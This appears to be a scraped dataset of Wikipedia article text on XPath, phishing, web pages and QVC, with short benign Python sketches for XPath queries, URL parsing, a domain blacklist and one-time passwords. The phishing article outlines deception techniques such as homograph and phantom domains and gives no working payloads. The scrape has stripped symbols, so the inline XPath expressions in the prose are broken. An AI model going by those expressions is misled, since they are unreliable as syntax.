(i.e. that of the immediately preceding node test) and do not alter that context. All predicates must be satisfied for a match to occur. When the value of the predicate is numeric, it is syntactic-sugar for comparing against the node's position in the node-set (as given by the function position()). So p 1 is shorthand for p position() 1 and selects the first p element child, while p last() is shorthand for p position() last() and selects the last p child of the context node. In other cases, the value of the predicate is automatically converted to a Boolean. When the predicate evaluates to a node-set, the result is true when the node-set is non-empty clarify . Thus p x selects those p elements that have an attribute named x. A more complex example: the expression a html lang 'en' href 'help.php' 1 target selects the value of the target attribute of the first a element among the children of the context node that has its href attribute set to help.php, provided the document's html top-level element also has a lang attribute set to en. The reference to an attribute of the top-level element in the first predicate affects neither the context of other predicates nor that of the location step itself. Predicate order is significant if predicates test the position of a node. Each predicate takes a node-set returns a (potentially) smaller node-set. So a 1 href 'help.php' will find a match only if the first a child of the context node satisfies the condition href 'help.php', while a href 'help.php' 1 will find the first a child that satisfies this condition. XPath 1.0 defines four data types: node-sets (sets of nodes with no intrinsic order), strings, numbers and Booleans. 
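A brief sketch of the location paths, predicates, and axes described above, assuming lxml is available (it is not a dependency elsewhere in this notebook; pip install lxml). The document and expressions are illustrative only.

# Sketch of the XPath constructs described above, using lxml.
from lxml import etree

doc = etree.fromstring("""
<A>
  <B><C>one</C><C>two</C></B>
  <B><a href="help.php">help</a><a href="other.php">other</a></B>
</A>
""")

# Abbreviated location path: C elements that are children of B children of A.
print(doc.xpath("/A/B/C/text()"))                       # ['one', 'two']

# Positional predicate: first child, whatever its name, of every B element.
print([e.tag for e in doc.xpath("//B/*[1]")])           # ['C', 'a']

# Attribute test in a predicate, then the attribute axis itself.
print(doc.xpath("//a[@href='help.php']/text()"))        # ['help']
print(doc.xpath("//a/@href"))                           # ['help.php', 'other.php']

# The same first expression in the full, unabbreviated syntax.
print(doc.xpath("/child::A/child::B/child::C/text()"))  # ['one', 'two']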
The available operators are: The function library includes: Some of the more commonly useful functions are detailed below. c Expressions can be created inside predicates using the operators: , , , , and . Boolean expressions may be combined with brackets () and the Boolean operators and and or as well as the not() function described above. Numeric calculations can use , , , div and mod. Strings can consist of any Unicode characters. item price 2 discount selects items whose price attribute is greater than twice the numeric value of their discount attribute. Entire node-sets can be combined ('unioned') using the vertical bar character . Node sets that meet one or more of several conditions can be found by combining the conditions inside a predicate with 'or'. v x or y w z will return a single node-set consisting of all the v elements that have x or y child-elements, as well as all the w elements that have z child-elements, that were found in the current context. Given a sample XML document The XPath expression selects name attributes for all projects, and selects all editions of all projects, and selects addresses of all English Wikimedia projects (text of all edition elements where language attribute is equal to English). And the following selects addresses of all Wikipedias (text of all edition elements that exist under project element with a name attribute of Wikipedia). The Java package javax.xml.xpath has been part of Java standard edition since Java 5 8 via the Java API for XML Processing. Technically this is an XPath API rather than an XPath implementation, and it allows the programmer the ability to select a specific implementation that conforms to the interface. XPath is increasingly used to express constraints in schema languages for XML. |
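The sample XML document and the expressions referred to above were lost in the scraped text, so the following is a plausible reconstruction; the element and attribute names (wikimedia, project, editions, edition, language) are assumptions rather than the original Wikipedia sample.

# Hedged reconstruction of the Wikimedia-projects XPath example referenced above.
from lxml import etree

projects = etree.fromstring("""
<wikimedia>
  <project name="Wikipedia">
    <editions>
      <edition language="English">en.wikipedia.org</edition>
      <edition language="German">de.wikipedia.org</edition>
    </editions>
  </project>
  <project name="Wiktionary">
    <editions>
      <edition language="English">en.wiktionary.org</edition>
    </editions>
  </project>
</wikimedia>
""")

print(projects.xpath("//project/@name"))                          # name attributes of all projects
print(len(projects.xpath("//edition")))                           # all editions of all projects
print(projects.xpath("//edition[@language='English']/text()"))    # addresses of English editions
print(projects.xpath("//project[@name='Wikipedia']//edition/text()"))  # all Wikipedias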
56 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Phishing | Phishing is a form of social engineering and a scam where attackers deceive people into revealing sensitive information 1 or installing malware such as viruses, worms, adware, or ransomware. Phishing attacks have become increasingly sophisticated and often transparently mirror the site being targeted, allowing the attacker to observe everything while the victim navigates the site, and transverses any additional security boundaries with the victim. 2 As of 2020, it is the most common type of cybercrime, with the FBI's Internet Crime Complaint Center reporting more incidents of phishing than any other type of computer crime. 3 The term "phishing" was first recorded in 1995 in the cracking toolkit AOHell, but may have been used earlier in the hacker magazine 2600. 4 5 6 It is a variation of fishing and refers to the use of lures to "fish" for sensitive information. 5 7 8 Measures to prevent or reduce the impact of phishing attacks include legislation, user education, public awareness, and technical security measures. 9 The importance of phishing awareness has increased in both personal and professional settings, with phishing attacks among businesses rising from 72% in 2017 to 86% in 2020. 10 Phishing attacks, often delivered via email spam, attempt to trick individuals into giving away sensitive information and or login credentials. Most attacks are "bulk attacks" that are not targeted and are instead sent in bulk to a wide audience. 11 The goal of the attacker can vary, with common targets including financial institutions, email and cloud productivity providers, and streaming services. 12 The stolen information or access may be used to steal money, install malware, or spear phish others within the target organization. 5 Compromised streaming service accounts may also be sold on darknet markets. 13 This type of social engineering attack can involve sending fraud emails or messages that appear to be from a trusted source, such as a bank or government agency. These messages typically redirect to a fake login page where the user is prompted to enter their login credentials. Spear phishing is a targeted phishing attack that uses personalized emails 14 to trick a specific individual or organization into believing they are legitimate. It often utilizes personal information about the target to increase the chances of success. 15 16 17 18 These attacks often target executives or those in financial departments with access to sensitive financial data and services. Accountancy and audit firms are particularly vulnerable to spear phishing due to the value of the information their employees have access to. 19 The Russian government run Threat Group 4127 (Fancy Bear) (GRU Unit 26165) targeted Hillary Clinton's 2016 presidential campaign with spear phishing attacks on over 1,800 Google accounts, using the accounts-google.com domain to threaten targeted users. 20 21 A study on spear phishing susceptibility among different age groups found that 43% of youth aged 18 25 and 58% of older users clicked on simulated phishing links in daily emails over 21 days. Older women had the highest susceptibility, while susceptibility in young users declined over the study, but remained stable in older users. 22 Whaling attacks use spear phishing techniques to target senior executives and other high-profile individuals 23 with customized content, often related to a subpoena or customer complaint. 
24 CEO fraud involves sending fake emails from senior executives to trick employees into sending money to an offshore account. 25 It has a low success rate, but can result in organizations losing large sums of money. 26 Clone phishing is a type of attack where a legitimate email with an attachment or link is copied and modified to contain malicious content. The modified email is then sent from a fake address made to look like it's from the original sender. The attack may appear to be a resend or update of the original email. It often relies on the sender or recipient being previously hacked so the attacker can access the legitimate email. 27 28 Voice over IP (VoIP) is used in vishing or voice phishing attacks, 29 where attackers make automated phone calls to large numbers of people, often using text-to-speech synthesizers, claiming fraudulent activity on their accounts. The attackers spoof the calling phone number to appear as if it is coming from a legitimate bank or institution. The victim is then prompted to enter sensitive information or connected to a live person who uses social engineering tactics to obtain information. 29 Vishing takes advantage of the public's lower awareness and trust in voice telephony compared to email phishing. 30 SMS phishing 31 or smishing 32 33 is a type of phishing attack that uses text messages from a cell phone or smartphone to deliver a bait message. 34 The victim is usually asked to click a link, call a phone number, or contact an email address provided by the attacker. They may then be asked to provide private information, such as login credentials for other websites. The difficulty in identifying illegitimate links can be compounded on mobile devices due to the limited display of URLs in mobile browsers. 35 Smishing can be just as effective as email phishing, as many smartphones have fast internet connectivity. Smishing messages may also come from unusual phone numbers. 36 Page hijacking involves redirecting users to malicious websites or exploit kits through the compromise of legitimate web pages, often using cross site scripting. Hackers may insert exploit kits such as MPack into compromised websites to exploit legitimate users visiting the server. Page hijacking can also involve the insertion of malicious inline frames, allowing exploit kits to load. This tactic is often used in conjunction with watering hole attacks on corporate targets. 37 Calendar phishing involves sending fake calendar invitations with phishing links. These invitations often mimic common event requests and can easily be added to calendars automatically. 38 To protect against this form of fraud, former Google click fraud czar Shuman Ghosemajumder recommends changing calendar settings to not automatically add new invitations. 39 QR codes have been used maliciously in phishing attacks. 40 The term "quishing" involves deceiving individuals into thinking a QR code is harmless while the true intent is malicious, aiming to access sensitive information. 40 Cybercriminals exploit the trust placed in QR codes, particularly on mobile phones, which are more vulnerable to attacks compared to desktop operating systems. 40 Quishing attacks often involve sending QR codes via email, enticing users to scan them to verify accounts, leading to potential device compromise. 40 Malicious QR codes can be stickers covering authentic ones at payment terminals in the street, they can also be printed on fake flyers or fake restaurant menus with enticing discounts, or embedded in videos. 
41 They can even be printed on parking tickets placed under cars' windshield wiper. 41 It is advised to exercise caution and avoid scanning QR codes unless the source is verified, 40 that it is not a sticker on top of another sticker, and to also check the destination page's URL. 41 Phishing attacks often involve creating fake links that appear to be from a legitimate organization. 42 These links may use misspelled URLs or subdomains to deceive the user. In the following example URL, http: www.yourbank.example.com , it can appear to the untrained eye as though the URL will take the user to the example section of the yourbank website; actually this URL points to the "yourbank" (i.e. phishing subdomain) section of the example website (fraudster's domain name). Another tactic is to make the displayed text for a link appear trustworthy, while the actual link goes to the phisher's site. To check the destination of a link, many email clients and web browsers will show the URL in the status bar when the mouse is hovering over it. However, some phishers may be able to bypass this security measure. 43 Internationalized domain names (IDNs) can be exploited via IDN spoofing 44 or homograph attacks 45 to allow attackers to create fake websites with visually identical addresses to legitimate ones. These attacks have been used by phishers to disguise malicious URLs using open URL redirectors on trusted websites. 46 47 48 Even digital certificates, such as SSL, may not protect against these attacks as phishers can purchase valid certificates and alter content to mimic genuine websites or host phishing sites without SSL. 49 When publishing hyperlinks on websites, a programmer or contributor may accidentally mistype the intended URL. The link they create may, by chance, point to a never-registered domain. This creates a phantom domain, which is a never-registered domain with preexisting active inbound links from other websites. By analyzing crawls of the web, an attacker can detect these hijackable hyperlinks and purchase the phantom domains they point to, spoofing the expected web site to phish information from users. Research published at The Web Conference 2024 shows 572,000 .com phantom domains exist with inbound links coming from a wide variety of sources, including large organizations and governments. 50 Phishers have sometimes used images instead of text to make it harder for anti-phishing filters to detect the text commonly used in phishing emails. 51 In response, more sophisticated anti-phishing filters are able to recover hidden text in images using optical character recognition (OCR). 52 Phishing often uses social engineering techniques to trick users into performing actions such as clicking a link or opening an attachment, or revealing sensitive information. It often involves pretending to be a trusted entity and creating a sense of urgency, 53 like threatening to close or seize a victim's bank or insurance account. 54 An alternative technique to impersonation-based phishing is the use of fake news articles to trick victims into clicking on a malicious link. These links often lead to fake websites that appear legitimate, 55 but are actually run by attackers who may try to install malware or present fake "virus" notifications to the victim. 56 Early phishing techniques can be traced back to the 1990s, when black hat hackers and the warez community used AOL to steal credit card information and commit other online crimes. The term "phishing" is said to have been coined by Khan C. 
Smith, a well-known spammer and hacker, 57 and its first recorded mention was found in the hacking tool AOHell, which was released in 1995. AOHell allowed hackers to impersonate AOL staff and send instant messages to victims asking them to reveal their passwords. 58 59 In response, AOL implemented measures to prevent phishing and eventually shut down the warez scene on their platform. 60 61 In the 2000s, phishing attacks became more organized and targeted. The first known direct attempt against a payment system, E-gold, occurred in June 2001, and shortly after the September 11 attacks, a "post 9 11 id check" phishing attack followed. 62 The first known phishing attack against a retail bank was reported in September 2003. 63 Between May 2004 and May 2005, approximately 1.2 million computer users in the United States suffered losses caused by phishing, totaling approximately US$929 million. 64 Phishing was recognized as a fully organized part of the black market, and specializations emerged on a global scale that provided phishing software for payment, which were assembled and implemented into phishing campaigns by organized gangs. 65 66 The United Kingdom banking sector suffered from phishing attacks, with losses from web banking fraud almost doubling in 2005 compared to 2004. 67 68 In 2006, almost half of phishing thefts were committed by groups operating through the Russian Business Network based in St. Petersburg. 69 Email scams posing as the Internal Revenue Service were also used to steal sensitive data from U.S. taxpayers. 70 Social networking sites are a prime target of phishing, since the personal details in such sites can be used in identity theft; 71 In 2007, 3.6 million adults lost US$3.2 billion due to phishing attacks. 72 The Anti-Phishing Working Group reported receiving 115,370 phishing email reports from consumers with US and China hosting more than 25% of the phishing pages each in the third quarter of 2009. 73 Phishing in the 2010s saw a significant increase in the number of attacks. In 2011, the master keys for RSA SecurID security tokens were stolen through a phishing attack. 74 75 Chinese phishing campaigns also targeted high-ranking officials in the US and South Korean governments and military, as well as Chinese political activists. 76 77 According to Ghosh, phishing attacks increased from 187,203 in 2010 to 445,004 in 2012. In August 2013, Outbrain suffered a spear-phishing attack, 78 and in November 2013, 110 million customer and credit card records were stolen from Target customers through a phished subcontractor account. 79 CEO and IT security staff subsequently fired. 80 In August 2014, iCloud leaks of celebrity photos were based on phishing e-mails sent to victims that looked like they came from Apple or Google. 81 In November 2014, phishing attacks on ICANN gained administrative access to the Centralized Zone Data System; also gained was data about users in the system - and access to ICANN's public Governmental Advisory Committee wiki, blog, and whois information portal. 82 Fancy Bear was linked to spear-phishing attacks against the Pentagon email system in August 2015, 83 84 and the group used a zero-day exploit of Java in a spear-phishing attack on the White House and NATO. 85 86 Fancy Bear carried out spear phishing attacks on email addresses associated with the Democratic National Committee in the first quarter of 2016. 
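Returning to the deceptive URL discussed a few paragraphs above (www.yourbank.example.com), here is a minimal sketch of how the controlling domain can be pulled out with the standard library. Taking the last two host labels is a deliberate simplification for illustration; a robust check would consult the Public Suffix List.

# Sketch relating to the deceptive-URL discussion above: the part of the
# hostname that decides where a link really goes is the registered domain,
# not the left-most label.
from urllib.parse import urlparse

def naive_registered_domain(url):
    host = urlparse(url).hostname or ""
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host

for link in ["http://www.yourbank.example.com/login",
             "https://www.yourbank.com/login"]:
    print(link, "->", naive_registered_domain(link))
# The first link belongs to example.com, not to yourbank.com.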
87 88 In August 2016, members of the Bundestag and political parties such as Linken-faction leader Sahra Wagenknecht, Junge Union, and the CDU of Saarland were targeted by spear-phishing attacks suspected to be carried out by Fancy Bear. In August 2016, the World Anti-Doping Agency reported the receipt of phishing emails sent to users of its database claiming to be official WADA, but consistent with the Russian hacking group Fancy Bear. 89 90 91 In 2017, 76% of organizations experienced phishing attacks, with nearly half of the information security professionals surveyed reporting an increase from 2016. In the first half of 2017, businesses and residents of Qatar were hit with over 93,570 phishing events in a three-month span. 92 In August 2017, customers of Amazon faced the Amazon Prime Day phishing attack, when hackers sent out seemingly legitimate deals to customers of Amazon. When Amazon's customers attempted to make purchases using the "deals", the transaction would not be completed, prompting the retailer's customers to input data that could be compromised and stolen. 93 In 2018, the company block.one, which developed the EOS.IO blockchain, was attacked by a phishing group who sent phishing emails to all customers aimed at intercepting the user's cryptocurrency wallet key, and a later attack targeted airdrop tokens. 94 Phishing attacks have evolved in the 2020s to include elements of social engineering, as demonstrated by the July 15, 2020, Twitter breach. In this case, a 17 year-old hacker and accomplices set up a fake website resembling Twitter's internal VPN provider used by remote working employees. Posing as helpdesk staff, they called multiple Twitter employees, directing them to submit their credentials to the fake VPN website. 95 Using the details supplied by the unsuspecting employees, they were able to seize control of several high-profile user accounts, including those of Barack Obama, Elon Musk, Joe Biden, and Apple Inc.'s company account. The hackers then sent messages to Twitter followers soliciting Bitcoin, promising to double the transaction value in return. The hackers collected 12.86 BTC (about $117,000 at the time). 96 There are anti-phishing websites which publish exact messages that have been recently circulating the internet, such as FraudWatch International and Millersmiles. Such sites often provide specific details about the particular messages. 97 98 As recently as 2007, the adoption of anti-phishing strategies by businesses needing to protect personal and financial information was low. 99 Now there are several different techniques to combat phishing, including legislation and technology created specifically to protect against phishing. These techniques include steps that can be taken by individuals, as well as by organizations. Phone, web site, and email phishing can now be reported to authorities, as described below. Effective phishing education, including conceptual knowledge 100 and feedback, 101 102 is an important part of any organization's anti-phishing strategy. While there is limited data on the effectiveness of education in reducing susceptibility to phishing, 103 much information on the threat is available online. 54 Simulated phishing campaigns, in which organizations test their employees' training by sending fake phishing emails, are commonly used to assess their effectiveness. 
One example is a study by the National Library of Medicine, in which an organization received 858,200 emails during a 1 month testing period, with 139,400 (16%) being marketing and 18,871 (2%) being identified as potential threats. These campaigns are often used in the healthcare industry, as healthcare data is a valuable target for hackers. These campaigns are just one of the ways that organizations are working to combat phishing. 104 To avoid phishing attempts, people can modify their browsing habits 105 and be cautious of emails claiming to be from a company asking to "verify" an account. It's best to contact the company directly or manually type in their website address rather than clicking on any hyperlinks in suspicious emails. 106 Nearly all legitimate e-mail messages from companies to their customers contain an item of information that is not readily available to phishers. Some companies, for example PayPal, always address their customers by their username in emails, so if an email addresses the recipient in a generic fashion ("Dear PayPal customer") it is likely to be an attempt at phishing. 107 Furthermore, PayPal offers various methods to determine spoof emails and advises users to forward suspicious emails to their spoof PayPal.com domain to investigate and warn other customers. However it is unsafe to assume that the presence of personal information alone guarantees that a message is legitimate, 108 and some studies have shown that the presence of personal information does not significantly affect the success rate of phishing attacks; 109 which suggests that most people do not pay attention to such details. Emails from banks and credit card companies often include partial account numbers, but research 110 has shown that people tend to not differentiate between the first and last digits. This is an issue because the first few digits are often the same for all clients of a financial institution. A study on phishing attacks in game environments found that educational games can effectively educate players against information disclosures and can increase awareness on phishing risk thus mitigating risks. 111 This an example of how users can be trained through game based models. The Anti-Phishing Working Group, one of the largest anti-phishing organizations in the world, produces regular report on trends in phishing attacks. 112 Google posted a video demonstrating how to identify and avoid phishing scams. 113 A wide range of technical approaches are available to prevent phishing attacks reaching users or to prevent them from successfully capturing sensitive information. Specialized spam filters can reduce the number of phishing emails that reach their addressees' inboxes. These filters use a number of techniques including machine learning 114 and natural language processing approaches to classify phishing emails, 115 116 and reject email with forged addresses. 117 Another popular approach to fighting phishing is to maintain a list of known phishing sites and to check websites against the list. One such service is the Safe Browsing service. 118 Web browsers such as Google Chrome, Internet Explorer 7, Mozilla Firefox 2.0, Safari 3.2, and Opera all contain this type of anti-phishing measure. 119 120 121 122 123 Firefox 2 used Google anti-phishing software. Opera 9.1 uses live blacklists from Phishtank, cyscon and GeoTrust, as well as live whitelists from GeoTrust. 
Some implementations of this approach send the visited URLs to a central service to be checked, which has raised concerns about privacy. 124 According to a report by Mozilla in late 2006, Firefox 2 was found to be more effective than Internet Explorer 7 at detecting fraudulent sites in a study by an independent software testing company. 125 An approach introduced in mid 2006 involves switching to a special DNS service that filters out known phishing domains: this will work with any browser, 126 and is similar in principle to using a hosts file to block web adverts. To mitigate the problem of phishing sites impersonating a victim site by embedding its images (such as logos), several site owners have altered the images to send a message to the visitor that a site may be fraudulent. The image may be moved to a new filename and the original permanently replaced, or a server can detect that the image was not requested as part of normal browsing, and instead send a warning image. 127 128 The Bank of America website 129 130 is one of several that asks users to select a personal image (marketed as SiteKey) and displays this user-selected image with any forms that request a password. Users of the bank's online services are instructed to enter a password only when they see the image they selected. However, several studies suggest that few users refrain from entering their passwords when images are absent. 131 132 In addition, this feature (like other forms of two-factor authentication) is susceptible to other attacks, such as those suffered by Scandinavian bank Nordea in late 2005, 133 and Citibank in 2006. 134 A similar system, in which an automatically generated "Identity Cue" consisting of a colored word within a colored box is displayed to each website user, is in use at other financial institutions. 135 Security skins 136 137 are a related technique that involves overlaying a user-selected image onto the login form as a visual cue that the form is legitimate. Unlike the website-based image schemes, however, the image itself is shared only between the user and the browser, and not between the user and the website. The scheme also relies on a mutual authentication protocol, which makes it less vulnerable to attacks that affect user-only authentication schemes. Still another technique relies on a dynamic grid of images that is different for each login attempt. The user must identify the pictures that fit their pre-chosen categories (such as dogs, cars and flowers). Only after they have correctly identified the pictures that fit their categories are they allowed to enter their alphanumeric password to complete the login. Unlike the static images used on the Bank of America website, a dynamic image-based authentication method creates a one-time passcode for the login, requires active participation from the user, and is very difficult for a phishing website to correctly replicate because it would need to display a different grid of randomly generated images that includes the user's secret categories. 138 Several companies offer banks and other organizations likely to suffer from phishing scams round-the-clock services to monitor, analyze and assist in shutting down phishing websites. 139 Automated detection of phishing content is still below accepted levels for direct action, with content-based analysis reaching between 80% and 90% of success 140 so most of the tools include manual steps to certify the detection and authorize the response. 
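As a minimal sketch of the blacklist approach described above (real browsers query a service such as Google Safe Browsing or PhishTank rather than a hard-coded set; the domains below are made up for illustration):
from urllib.parse import urlparse
# Hypothetical local blacklist standing in for a Safe Browsing-style service.
PHISHING_DOMAINS = {"paypa1-login.example.com", "secure-bank-update.example.net"}
def is_blacklisted(url):
    host = urlparse(url).netloc.lower().split(":")[0]
    # Match the host itself or any parent domain on the list
    parts = host.split(".")
    candidates = {".".join(parts[i:]) for i in range(len(parts))}
    return bool(candidates & PHISHING_DOMAINS)
for url in ("https://paypa1-login.example.com/verify", "https://en.wikipedia.org/wiki/Phishing"):
    print(url, "->", "BLOCK" if is_blacklisted(url) else "allow")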
141 Individuals can contribute by reporting phishing to both volunteer and industry groups, 142 such as cyscon or PhishTank. 143 Phishing web pages and emails can be reported to Google. 144 145 Solutions have also emerged using the mobile phone 146 (smartphone) as a second channel for verification and authorization of banking transactions. Organizations can implement two-factor or multi-factor authentication (MFA), which requires a user to present at least two factors when logging in (for example, a user must both present a smart card and enter a password). This mitigates some risk: in the event of a successful phishing attack, the stolen password on its own cannot be reused to further breach the protected system. However, there are several attack methods which can defeat many of the typical systems. 147 MFA schemes such as WebAuthn address this issue by design. Organizations that prioritize security over convenience can require users of their computers to use an email client that redacts URLs from email messages, thus making it impossible for the reader of the email to click on a link, or even copy a URL. While this may result in an inconvenience, it does almost eliminate email phishing attacks. An article in Forbes in August 2014 argues that the reason phishing problems persist even after a decade of anti-phishing technologies being sold is that phishing is "a technological medium to exploit human weaknesses" and that technology cannot fully compensate for human weaknesses. 148 149 Organizational responses: Scholars have found that investment in both technological and organizational factors can impact protection against phishing. The studies found that organizations can improve the technical education of their employees if they include socio-technical factors in their training. 150 On January 26, 2004, the U.S. Federal Trade Commission filed the first lawsuit against a Californian teenager suspected of phishing by creating a webpage mimicking America Online and stealing credit card information. 151 Other countries have followed this lead by tracing and arresting phishers. A phishing kingpin, Valdir Paulo de Almeida, was arrested in Brazil for leading one of the largest phishing crime rings, which in two years stole between US$18 million and US$37 million. 152 UK authorities jailed two men in June 2005 for their role in a phishing scam, 153 in a case connected to the U.S. Secret Service Operation Firewall, which targeted notorious "carder" websites. 154 In 2006, Japanese police arrested eight people for creating fake Yahoo Japan websites, netting themselves ¥100 million (US$870,000), 155 and the FBI detained a gang of sixteen in the U.S. and Europe in Operation Cardkeeper. 156 Senator Patrick Leahy introduced the Anti-Phishing Act of 2005 to Congress in the United States on March 1, 2005. This bill aimed to impose fines of up to $250,000 and prison sentences of up to five years on criminals who used fake websites and emails to defraud consumers. 157 In the UK, the Fraud Act 2006 158 introduced a general offense of fraud punishable by up to ten years in prison and prohibited the development or possession of phishing kits with the intention of committing fraud. 159 Companies have also joined the effort to crack down on phishing. On March 31, 2005, Microsoft filed 117 federal lawsuits in the U.S. District Court for the Western District of Washington. The lawsuits accuse "John Doe" defendants of obtaining passwords and confidential information.
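As a concrete illustration of the multi-factor authentication point earlier in this passage: even if a phisher captures a password, a time-based one-time password (TOTP) from the user's device expires within seconds. The sketch below computes a standard RFC 6238 code using only the Python standard library; the base32 secret is a throwaway demo value.
import base64
import hashlib
import hmac
import struct
import time
def totp(secret_b32, interval=30, digits=6):
    """Compute an RFC 6238 time-based one-time password (SHA-1 variant)."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int(time.time()) // interval              # current 30-second time step
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                          # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)
# Throwaway demo secret; a stolen password alone is useless without the device holding this secret.
print("Current one-time code:", totp("JBSWY3DPEHPK3PXP"))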
March 2005 also saw a partnership between Microsoft and the Australian government teaching law enforcement officials how to combat various cyber crimes, including phishing. 160 Microsoft announced a planned further 100 lawsuits outside the U.S. in March 2006, 161 followed by the commencement, as of November 2006, of 129 lawsuits mixing criminal and civil actions. 162 AOL reinforced its efforts against phishing 163 in early 2006 with three lawsuits 164 seeking a total of US$18 million under the 2005 amendments to the Virginia Computer Crimes Act, 165 166 and Earthlink has joined in by helping to identify six men subsequently charged with phishing fraud in Connecticut. 167 In January 2007, Jeffrey Brett Goodin of California became the first defendant convicted by a jury under the provisions of the CAN-SPAM Act of 2003. He was found guilty of sending thousands of emails to AOL users, while posing as the company's billing department, which prompted customers to submit personal and credit card information. Facing a possible 101 years in prison for the CAN-SPAM violation and ten other counts including wire fraud, the unauthorized use of credit cards, and the misuse of AOL's trademark, he was sentenced to serve 70 months. Goodin had been in custody since failing to appear for an earlier court hearing and began serving his prison term immediately. 168 169 170 171 |
57 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Web_page | A web page (or webpage) is a document on the Web that is accessed in a web browser. 1 A website typically consists of many web pages linked together under a common domain name. The term "web page" is thus a metaphor of paper pages bound together into a book. Each web page is identified by a distinct Uniform Resource Locator (URL). When the user inputs a URL into their web browser, the browser retrieves the necessary content from a web server and then transforms it into an interactive visual representation on the user's screen. 2 If the user clicks or taps a link, the browser repeats this process to load the new URL, which could be part of the current website or a different one. The browser has features, such as the address bar, that indicate which page is displayed. A web page is a structured document. The core element is a text file written in the HyperText Markup Language (HTML). This specifies the content of the page, 3 including images and video. Cascading Style Sheets (CSS) specify the presentation of the page. 3 CSS rules can be in separate text files or embedded within the HTML file. The vast majority 4 of pages have JavaScript programs, enabling a wide range of behavior. 3 The newer WebAssembly language can also be used as a supplement. 5 The most sophisticated web pages, known as web apps, combine these elements in a complex manner. From the perspective of server-side website deployment, there are two types of web pages: static and dynamic. Static pages are retrieved from the web server's file system without any modification, 6 while dynamic pages must be created by the server on the fly, typically reading from a database to fill out a template, before being sent to the user's browser. 7 An example of a dynamic page is a search engine results page. |
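Since this page structure is what the scraper in this notebook works against, here is a short sketch that inspects it using the requests, BeautifulSoup and html5lib packages installed above; the URL is only an example.
import requests
from bs4 import BeautifulSoup
url = "https://en.wikipedia.org/wiki/Web_page"  # example page only
resp = requests.get(url, timeout=10)
resp.raise_for_status()
soup = BeautifulSoup(resp.text, "html5lib")
# The HTML file carries the content; CSS and JavaScript arrive as linked resources.
print("Title:", soup.title.string if soup.title else "(none)")
print("Stylesheets:", len(soup.find_all("link", rel="stylesheet")))
print("Script tags:", len(soup.find_all("script")))
print("Links:", len(soup.find_all("a", href=True)))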
58 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/QVC | QVC (short for "Quality Value Convenience") is an American free-to-air television network and a flagship shopping channel specializing in televised home shopping, owned by Qurate Retail Group. Founded in 1986 by Joseph Segel in West Chester, Pennsylvania, United States, QVC broadcasts to more than 350 million households in seven countries, including channels in the UK, Germany, Japan, and Italy, along with a joint venture in China with China National Radio called CNR Mall. 2 As of December 2013, Halo2Cloud holds the network's record for most units sold in a day, with 380,000 chargers and total sales reaching $19 million. 3 QVC was founded on June 13, 1986, by Joseph Segel and investors including Ralph Roberts, the founder and chairperson of Comcast. Roberts was able to arrange deals in which cable companies received investment stakes in QVC in exchange for carrying the channel. 1 Sears was one of the first brands that QVC would represent, with a two-year exclusive agreement to sell Sears products through television shopping. 4 5 The corporation later set a new record for first full-year fiscal sales for a new public company of $112 million. 6 The channel was launched on November 24, 1986, with program hosts Kathy Levine, John Eastman, Ellen Langas, Bob Bowersox, and Cindy Briggs-Moore. 7 QVC celebrated its birthday each November 24 through 2008. 8 9 Initially broadcasting live from 7:30 p.m. until midnight ET each weekday and 24 hours a day each weekend, the channel extended its live programming to 24/7/364 in January 1987. Former QUBE host and producer Ron Giles was named an executive vice president and executive producer at QVC in late 1987. 10 In October 1988, the board of directors elected Michael C. Boyd to the position of senior executive vice president and chief operating officer. 11 In early 1990, Boyd would take the title of president, reportedly to relieve some of Segel's load. 12 In July 1989, QVC acquired the Cable Value Network, founded by Irwin L. Jacobs. The $380 million deal contributed to a loss of $17 million during the next fiscal quarter, and then led to difficulties in the couple of years that followed. 13 14 15 QVC first offered to buy out the Burbank-based Shop Television Network, which carried blocks of time offering JCPenney merchandise, on March 16, 1991, 16 a bid rejected by its producers and the Los Angeles Superior Court. On May 21, 1991, it acquired the channel and its 4 million subscribers, with a liability of $2 million to its producers, along with a license to carry JCPenney brands on-air. 17 A QVC offer to buy rival Home Shopping Network in March 1992 was sidetracked by antitrust concerns. 18 On July 12, 1993, QVC offered to acquire Home Shopping in a stock swap valued at about $1.1 billion, but talks faltered when QVC pursued a bid for Paramount in fall 1993. 19 Liberty Media Corp. held a controlling interest in the St. Petersburg, Florida-based Home Shopping Network along with their share of QVC. 20 Introduced to televised shopping by designer Diane von Fürstenberg a decade before their marriage, Fox founder Barry Diller pursued slick "infotainment" style programming as his next television venture. 21 After resigning as chairman of Fox Inc. in early 1992, Diller's Arrow Investments purchased a $25 million stake in QVC, or just under 3 percent of the company, in December 1992, and Diller succeeded Segel as chairman and chief executive on January 18, 1993.
22 Diller, known for building Fox as a fourth national television network in just five years, replaced QVC's second channel, The Fashion Channel, with Q2. 23 Debuting in spring 1994, Q2 was aimed at younger, more economic shoppers, and broadcast from New York City. The spin-off network was shelved in 1996, costing QVC $55 million. 24 QVC, under Diller, first placed a hostile $9.6 billion bid for Paramount in September 1993, when talks for a friendly merger between Paramount and Viacom, worth $7.2 billion at the time, were already under way. 25 QVC's more attractive bid was forced on Paramount in the February 4, 1994 decision of Paramount Communications, Inc. v. QVC Network, Inc. by the Delaware Supreme Court. Following Viacom's merger with Blockbuster that gave Viacom the financial lead, Diller proposed that QVC financial backer BellSouth could buy QVC shares after the merger to boost the value of QVC's stock to Paramount shareholders. 26 Diller dropped the proposal when reminded of its legal challenges and on February 14, 1994, QVC lost its bid for Paramount to a $9.85 billion bid from Viacom. 27 28 Diller's reported five-word response to the end of what The Los Angeles Times called "the biggest takeover war of the 1990s" was: "They won. We lost. Next. 29 Diller changed the name of QVC Network to QVC, Inc. in 1994, while creating a holding company to allow the firm to diversify and build assets and divisions separately. Among the changes were the creation of two new divisions, Q Direct, to produce infomercials and 60 and 120 second direct response TV commercials, and QVC Interactive, an online-shopping service. 30 QVC launched their internet shopping site, iQVC, on September 15, 1996. 31 QVC's shopping channel based in Mexico, airing in non-primetime programming hours on Canal 4, launched November 1, 1993 in a partnership with Televisa, and known domestically as CVC (a 